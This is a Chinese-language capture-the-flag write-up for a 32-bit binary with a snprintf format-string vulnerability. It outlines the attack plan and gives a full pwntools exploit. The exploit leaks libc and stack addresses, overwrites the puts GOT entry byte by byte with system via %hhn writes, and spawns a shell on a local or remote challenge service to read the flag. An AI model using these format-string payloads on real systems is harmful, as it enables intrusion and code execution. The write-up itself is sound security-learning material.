格式化字符串漏洞 snprintf
程序先读入串,再用snprintf输出,由于snprintf有长度限制,每次只能一位一位的改。
int sub_8048B76()
{
size_t v0; // eax
const char *v1; // eax
v0 = strlen(s);
v1 = (const char *)sub_804869D(s, v0, 0);
return snprintf(byte_804A8A0, 0x800u, "%s", v1);
}
思路:
- 先通过偏移打印出各部分加载地址
- 利用argv的ebp链在后部写got.puts的地址+1,+2,+3(argv的偏移是不固定的,需要在泄露地址后计算)
- 一次(4字节)写为system
- 发送/bin/sh
完成后看别人的exp,发现这个题栈可执行,直接将ebp+4将ret地址改为输入串指针(当作jmp)执行shellcode,在输入的时候先输入shellcode后边写ebp地址和数字。
完整exp:
from pwn import *
from base64 import b64encode
local = 1
if local == 1:
p = process('./pwn')
else:
p = remote('111.200.241.244', 63770)
libc_elf = ELF('/home/shi/buuctf/buuoj_2.23_i386/libc-2.23-i386-0ubuntu11.so')
one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
offset_main_ret = 0x18637
elf = ELF('./pwn')
context(arch='i386', log_level='debug')
'''
0000| 0xfff41e70 --> 0x804a8a0 ("%29$x,%12$x,%9$x,") #6
0012| 0xfff41e7c --> 0x83b0008 ("%29$x,%12$x,%9$x,") #9
0024| 0xfff41e88 --> 0xfff41ea8 --> 0xfff41ec8 --> 0x0 #12
0092| 0xfff41ecc --> 0xf7d7c637 (<__libc_start_main+247>: add esp,0x10) #29
0100| 0xfff41ed4 --> 0xfff41f64 --> 0xfff4240b ("./pwn") #31->69->792:xxx400
0104| 0xfff41ed8 --> 0xfff41f6c --> 0xfff42411 ("SHELL=/bin/bash") #32->71
'''
def add(msg):
p.sendline(b64encode(msg))
gdb.attach(p, 'b*0x8048bc0')
pause()
add(b'%29$x,%12$x,%9$x,%31$x,')
libc_base = int(p.recvuntil(b',', drop=True), 16) - offset_main_ret
libc_elf.address = libc_base
stack_addr= int(p.recvuntil(b',', drop=True), 16) - 0x38
heap_addr = int(p.recvuntil(b',', drop=True), 16)
print('libc:', hex(libc_base), 'stack#31:', hex(stack_addr))
#31->67->300
stack_67 = int(p.recvuntil(b',', drop=True), 16)
base_off = 6
base_67 = (stack_67 - stack_addr)//4+ base_off
print('#67:', base_67, hex(stack_67))
add(f'%{base_67}$x,'.encode())
stack_300 = int(p.recvuntil(b',', drop=True), 16) & 0xffffff00
base_300 = (stack_300 - stack_addr)//4+ base_off
print('#300:', base_300, hex(stack_300))
vv = p32(elf.got['puts'])+p32(elf.got['puts']+1)+p32(elf.got['puts']+2)+p32(elf.got['puts']+3)
for i in range(16):
payload = b'A'*i + f'%31$hhn'.encode()
add(payload)
payload = f'%{vv[i]}c%{base_67}$hhn,,,'.encode()
add(payload)
p.recvuntil(b',,,')
ss = p32(libc_elf.sym['system'])
p0 = ss[0]
p1 = (0x100 + ss[1] - ss[0]) & 0xff
p2 = (0x100 + ss[2] - ss[1]) & 0xff
p3 = (0x100 + ss[3] - ss[2]) & 0xff
print(p0,p1,p2,p3, hex(libc_elf.sym['system']))
payload = f"%{p0}c%{base_300}$hhn%{p1}c%{base_300+1}$hhn%{p2}c%{base_300+2}$hhn%{p3}c%{base_300+3}$hhn;/bin/sh;#".encode()
add(payload)
add(b'/bin/sh\x00')
p.sendline(b'cat /flag')
p.interactive()
如果题的难度加大,堆栈设置不可执行就得回到这个解法了。